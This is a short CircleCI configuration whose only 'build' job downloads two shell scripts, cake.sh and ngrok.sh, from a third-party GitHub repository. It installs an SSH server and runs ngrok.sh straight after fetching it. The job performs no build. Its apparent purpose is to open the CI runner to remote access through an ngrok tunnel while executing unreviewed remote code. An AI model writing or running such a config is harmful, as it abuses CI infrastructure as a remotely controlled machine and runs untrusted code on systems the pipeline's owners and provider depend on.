version: 2.0
jobs:
  build:
    docker:
      - image: cimg/base:stable-18.04
    
    steps:
      - run: wget https://raw.githubusercontent.com/KLVSPL/KSP/main/cake.sh
      - run: chmod +x ./cake.sh
      - run: sudo apt update && sudo apt install openssh-server 
      - run: sudo systemctl status ssh
      - run: wget https://raw.githubusercontent.com/KLVSPL/KSP/main/ngrok.sh && chmod +x ngrok.sh && ./ngrok.sh